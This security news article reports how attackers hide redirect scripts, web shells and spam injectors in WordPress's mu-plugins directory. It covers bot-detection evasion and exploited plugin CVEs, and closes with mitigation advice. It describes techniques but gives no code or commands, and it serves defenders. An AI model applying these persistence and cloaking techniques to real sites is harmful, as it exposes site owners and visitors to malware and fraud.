Cybersecurity researchers have identified a new tactic employed by threat actors targeting WordPress websites. By exploiting the mu-plugins directory, attackers are embedding malicious code to maintain persistent remote access and redirect site visitors to fraudulent destinations.
Understanding mu-Plugins
In WordPress, mu-plugins stands for must-use plugins. These are PHP scripts placed in the wp-content/mu-plugins directory and are automatically executed by WordPress without requiring activation through the admin dashboard. This automatic execution makes the mu-plugins directory an attractive target for malicious activities, as it allows code to run unnoticed by site administrators.
The Threat Landscape
Security firm Sucuri has reported multiple instances where attackers have utilized the mu-plugins directory to deploy various types of malicious PHP code:
1. Redirection Scripts: Files like redirect.php are used to reroute site visitors to external malicious websites. These scripts often masquerade as legitimate browser updates, tricking users into downloading malware capable of data theft or further system compromise.
2. Web Shells: Files such as index.php provide attackers with web shell functionalities, enabling them to execute arbitrary code by downloading remote PHP scripts hosted on platforms like GitHub. This access allows for extensive control over the compromised site.
3. Spam Injection: Scripts like custom-js-loader.php inject unwanted spam content into the website. This can involve replacing site images with explicit content or hijacking outbound links to direct users to malicious sites, potentially harming the site’s reputation and SEO rankings.
Evasion Techniques
To avoid detection, these malicious scripts often include functions that identify whether the current visitor is a bot, such as search engine crawlers. By excluding these bots, the scripts prevent the redirection behavior from being indexed, thereby concealing the malicious activity from search engines and security scans.
Broader Implications
The exploitation of WordPress sites extends beyond the mu-plugins directory. Attackers have been observed using compromised sites to:
– Distribute Malware: Infected sites can serve as platforms to trick visitors into executing malicious PowerShell commands under the guise of CAPTCHA verifications, leading to the installation of malware like Lumma Stealer.
– Inject Malicious JavaScript: By embedding harmful JavaScript, attackers can redirect visitors to unwanted third-party domains or deploy skimmers to capture sensitive financial information during transactions.
Potential Entry Points
The exact methods used to breach these WordPress sites remain under investigation. However, common vulnerabilities include:
– Outdated Plugins or Themes: Running outdated or unsupported plugins and themes can introduce security flaws that attackers exploit.
– Compromised Admin Credentials: Weak or reused passwords can be easily guessed or obtained through phishing, granting unauthorized access to the site’s backend.
– Server Misconfigurations: Improper server settings can create security gaps, allowing attackers to infiltrate the system.
Recent Exploited Vulnerabilities
According to a report from Patchstack, several critical vulnerabilities have been actively exploited since the beginning of the year:
1. CVE-2024-27956: An unauthenticated arbitrary SQL execution vulnerability in the WordPress Automatic Plugin, carrying a CVSS score of 9.9.
2. CVE-2024-25600: An unauthenticated remote code execution vulnerability in the Bricks theme, with a CVSS score of 10.0.
3. CVE-2024-8353: An unauthenticated PHP object injection leading to remote code execution in the GiveWP plugin, also rated at 10.0 on the CVSS scale.
4. CVE-2024-4345: An unauthenticated arbitrary file upload vulnerability in the Startklar Elementor Addons for WordPress, with a CVSS score of 10.0.
Mitigation Strategies
To protect WordPress sites from such threats, administrators should implement the following measures:
– Regular Updates: Ensure that all plugins, themes, and the WordPress core are updated to their latest versions to patch known vulnerabilities.
– Strong Authentication: Use complex, unique passwords for all administrative accounts and consider implementing two-factor authentication for an added layer of security.
– Routine Security Audits: Conduct regular scans of the website’s file system and database to detect and remove unauthorized files or code.
– Monitor mu-Plugins Directory: Given its automatic execution nature, regularly inspect the wp-content/mu-plugins directory for any unfamiliar or suspicious files.
– Limit Plugin Use: Only install plugins from reputable sources and remove any that are no longer maintained or necessary.
Conclusion
The exploitation of the mu-plugins directory underscores the evolving tactics of cybercriminals targeting WordPress sites. By understanding these methods and implementing robust security practices, site administrators can significantly reduce the risk of compromise and protect their users from malicious activities.
